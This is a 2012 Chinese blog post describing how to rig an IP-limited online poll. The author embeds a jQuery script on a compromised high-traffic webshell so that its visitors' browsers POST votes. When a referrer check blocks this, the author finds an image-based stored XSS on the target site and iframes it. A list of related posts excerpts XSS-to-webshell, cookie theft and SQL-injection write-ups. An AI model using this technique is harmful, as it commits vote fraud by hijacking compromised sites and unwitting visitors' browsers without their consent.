webshell + xss 猥琐刷某投票

团队成员发来一个投票的地址,需要撸某某网站的一个某某投票,果断看了下,ip限制了,看到post 数据包
  webshell + xss 猥琐刷某投票

   额 随便找个大流量shell post 数据
Js代码
<script type="text/javascript" src="http://code.jquery.com/jquery-latest.js"></script>

2 <script type="text/javascript">

3 $(document).ready(function(e) {

4 var timestamp = (new Date()).valueOf();

5 $.post("http://www.xxx.com/vote.json?t="+timestamp ,{itemId:10072});

6 });

观察下 firebug post 木有成功
webshell + xss 猥琐刷某投票

估计判断来路了,得从本站提交才行,看来得找本站的xss配合,果断撸起,看到有博客有富文本,一番fuzz之后,找到个图片型xss
webshell + xss 猥琐刷某投票

找个大流量的webshell Iframe这个页面,不过天色已晚,那就先发条邪恶的围脖
webshell + xss 猥琐刷某投票

webshell + xss 猥琐刷某投票

分类:默认分类 时间:2012-01-02 人气:33
本文关键词:
分享到:

相关文章

  • Jeecms变形记:xss变种到csrf再变种webshell(jeecms漏洞集合) 2013-08-15

    今晚花了4个小时去研究了一下jeecms,来看看一个xss如何变种webshell的 测试版本:jeecms-2012-sp1 官网:http://www.jeecms.com jeecms这个基于java开发的cms系统无比强大,现在已开源,有很多政府,学校,商业机构在使用,危害还是相当的大 白帽子们,拿出你们的末日day,放出来吧 详细说明: 我们直接进入主题 1.跨目录,跨权限,跨妹子 到jeecms官网演示站后台,瞧一瞧,目测到跨目录问题 直接浏览服务器根目录 由于家里网速较卡,而且官网

  • [.net学习]dtcms从前台Flash XSS到后台Getshell 2012-05-08

    DTcms:http://www.dtcms.net/index.aspx 一个开源.netcms,VS2010装MVC、编译发布、搭环境都花了半天,还好这个cms不要mssql,否则更麻烦。 扯点淡:来乌云也快一年了,一年里确实学到了很多知识。从最开始完全不懂PHP到现在能独立挖掘一些漏洞,写一些exp,也算是时间没有荒废。 然后,认识了一些基友,别人身上也学到很多自己不知道的东西。 期间也有过痛苦、开心、难过、兴奋,遇见过无耻的厂商,也收到过良心厂商的礼物。 还希望以后仍然能愉快地在乌云和各

  • 小松鼠的黑魔法-XSS 利用 2012-07-25

    目前XSS漏洞普遍存在,但是所玩出的花样招式并不多。希望这这个议题能够起到抛砖引玉的作用吸引更多的人分享有意思的玩法。 议题介绍一些XSS的基本应用以及进阶玩法,比如XSS探测环境,钓鱼,攻击内网这些非常有趣的玩法。让大家不再仅仅局限于拿个Cookie进后台。因为一旦Cookie存在HttpOnly属性或者后台做了访问控制等,就没的玩了 此议题希望能改变目前的这种状态。 议题前半部分更多是介绍玩法以及玩法的原理,后半部分便是结合实际的例子来给大家演示下这些玩法到底是如何去玩的有多么的有意思。 1

  • xss漏洞发现及利用 2012-07-31

    漏洞描述:在使用标签(tag)进行浏览时,由于没有很好的过滤用户输入(tag关键字)造成xss跨站漏洞,用户自定义的版块tag搜索和全局tag搜索列表。 利用形式1: http://clin003.com/web2/?u=Club_talk_list&tag=<script>alert(111)</script> 其中http://clin003.com/web2/为网站连接,Club_talk_list为用户自定义版块。 利用形式2: http://clin00

  • SecProject Web AppSec 之XSS解析 第二篇 2013-03-17

    还是先说明范例正常页面: 地址:http://sdl.me/challenge1/xss2/JsChallenge2.asp?input1=111&input2=222&input3=333 源码: <html> <head> <SCRIPT language="Javascript"> function setid(id, name) { if (document.getElementById('222').value != '111') {

  • Docmint CMS v1.0 XSS 缺陷 2013-06-28

    +===================================================================================+ ./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _ / /_ _ _ _ / _ _/ _ _ / < |/_ _ _ _ / \_ _ _ _/ /___ / / __ | |) / | | / / \_ _ _ _/ /___ / / | __ || / | | / / _

  • typecho博客系统store跨站漏洞&轻松拿webshell 2013-08-12

    hiphop 来源:http://hi.baidu.com/securehiphop/blog/item/f5b3627a1768bcfc0ad187f5.html 源码下载:http://code.knowsky.com/down/14247.html 今天一早起来吃早餐的时候去下载一套博客来看一下 在管理员后台发表文章的地方发现到标题的地方title没做好过滤 于是可以拿来利用这属于是store cross site script 说明一下store cross site script这类跨

  • 方维团购系统存储型XSS可盲打后台 2013-12-18

    fanwe团购系统存在XSS可以获得管理员cookie并且进入后台 首先在一个商品进去,里面会有退款留言,都会有的就算支付了会有。 然后评论可以添加XSS,管理员每天都会查看,查看的时候就会取得管理员COOkie 然后通过cookie访问 然后进入后台 后台有SQL语句执行,可以通过它导出一句话,然后拿到webshell 修复方案: 添加验证

  • 任我行CRM权限绕过.上传.XSS.SQL注入各种简单测试 2014-01-10

    任我行CRM系统的权限绕过、上传、XSS、SQL注入各种简单测试 某公司内部网络使用这套系统,第一回见到,看到WEB应用就忍不住手贱~~ 1、上传 个人平台里面的编写内部邮件的时候上传附件,很多类型没有过滤,比如asa、cdx,当然也没有过滤xx.asp;x.jpg这种格式: 找到地址: 得到shell: 2、XSS 发生在很多地方,截图截了邮件标题这里: 3、权限绕过 可能有朋友所没有员工账户进不去系统这些都没办法利用啊!不够呢!这程序有权限绕过的~~直接访问:http://192.168.0

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.076 (s). 11 q(s)